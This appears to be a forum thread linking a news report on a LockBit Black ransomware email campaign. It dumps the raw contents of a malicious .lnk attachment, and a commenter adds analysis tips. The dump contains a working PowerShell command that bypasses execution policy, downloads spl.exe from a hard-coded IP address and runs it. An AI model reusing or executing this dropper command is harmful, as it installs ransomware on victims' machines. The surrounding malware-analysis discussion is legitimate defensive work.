https://www.msspalert.com/news/lockbit-black-ransomware-campaign-spraying-millions-of-messages
The contents of the document in one email looks like this:
cat Document/Document.doc.lnk L�F� r��tg��oH��}�a��tg���5P�O� �:i�+00�/C:\V1�[G�Windows@ ヌOwH$\L�.Y��:WindowsZ1$\jSystem32B ヌOwH$\��.U�WֲSystem32V2��X�� cmd.exe@ ᄊX��$\��.jg�4�cmd.exeJ-Im4/FC:\Windows\System32\cmd.exe!..\..\..\Windows\System32\cmd.exe�/c powershell.exe ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://178.16.54.109/spl.exe','%userprofile%\windrv.exe');Start-Process '%userprofile%\windrv.exe' shell32.dll�%windir%\System32\cmd.exe%windir%\System32\cmd.exe�%� �wN��]N�D.��Q���`�Xdesktop-4mksc1r~N8��jEJ�s@d����u^Y��'� ~N8��jEJ�s@d����u^Y��'� � ��1SPS��XF�L8C���&�m�m-S-1-5-21-711635060-3631344071-1154681243-50091SPS�mD��pH�H@.�=x�hHN�!"0
iPaq•10h ago
Bummer, I would've loved to analyze this spl.exe encryptor and maybe also troll the attacker
Also fyi, somehow, exiftool supports .lnk files so you can read the full command of the lnk cleanly with that.